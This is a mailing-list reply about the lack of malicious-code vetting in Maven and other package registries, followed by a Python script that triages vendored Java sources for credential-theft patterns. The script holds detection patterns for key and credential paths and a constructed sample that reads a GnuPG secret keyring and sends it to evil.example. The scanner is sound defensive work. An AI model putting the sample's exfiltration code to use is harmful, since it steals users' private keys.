Reily Siegel wrote on Mon 07-02-2022 at 13:06 [-0500]:
> This code is taken directly from Maven, as are many Java packages. This
> relies on whatever authentication Maven does to ensure packages are not
> forgeries.

I took a look at and AFAICT Maven does not have any process in place to prevent forgeries or malicious code; there does not appear to be any vetting process, though perhaps I haven't looked far enough.

A web page from cognitect telling ‘grab source code from Maven (com/cognitect/http-client)’, combined with going over the source code to sniff things like ‘Send ~/.gnupg to evil.com’ should be sufficient.

For the damage the absence of a vetting process can do, see e.g. .

The same issue appears to hold for PyPI, RubyGems and npm.

Greetings,
Maxime.
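The "sniff the source for things like 'Send ~/.gnupg to evil.com'" step above can be given a first automated pass before a human reads the code. The following is an added example, not code from the thread or from any project it mentions: it flags a source file only when it both references credential-bearing paths and calls outbound-network APIs, and runs over constructed sample files (the regexes and sample contents are assumptions, not real com.cognitect code).

```python
"""Heuristic triage of vendored Java sources for credential exfiltration
patterns. A hit is a lead for manual review, never a verdict; a clean
result proves nothing. Sample inputs below are constructed."""
import re

# Paths that hold keys or credentials on a developer machine (assumed list).
SENSITIVE_PATHS = re.compile(
    r"\.gnupg|\.ssh/|id_rsa|\.netrc|\.m2/settings\.xml|\.aws/credentials", re.I)
# Java APIs that can move data off the host (assumed list).
NETWORK_CALLS = re.compile(
    r"java\.net\.(URL|Socket|HttpURLConnection)|HttpClient|openConnection\(|new Socket\(")


def review_source(name, text):
    """Scan one file; return findings and whether both signals co-occur."""
    findings, secret, network = [], False, False
    for no, line in enumerate(text.splitlines(), 1):
        if SENSITIVE_PATHS.search(line):
            secret = True
            findings.append((no, "references credential path"))
        if NETWORK_CALLS.search(line):
            network = True
            findings.append((no, "outbound network API"))
    # Either signal alone is normal; the combination is what merits reading.
    return {"file": name, "findings": findings, "suspicious": secret and network}


def triage(sources):
    """Return the review records of files showing both signals."""
    return [r for r in (review_source(n, t) for n, t in sources.items())
            if r["suspicious"]]


# Constructed samples: one legitimate client, one exfiltrator, one config reader.
SAMPLES = {
    "HttpClient.java": "import java.net.HttpURLConnection;\n"
                       "URLConnection c = url.openConnection();\n",
    "Telemetry.java": "Path p = Path.of(System.getProperty(\"user.home\"), \".gnupg\");\n"
                      "byte[] blob = Files.readAllBytes(p.resolve(\"secring.gpg\"));\n"
                      "new Socket(\"evil.example\", 443).getOutputStream().write(blob);\n",
    "Config.java": "Path s = Path.of(home, \".m2/settings.xml\");\n",
}

if __name__ == "__main__":
    for rec in triage(SAMPLES):
        print(rec["file"], rec["findings"])  # Telemetry.java, lines 1-3
```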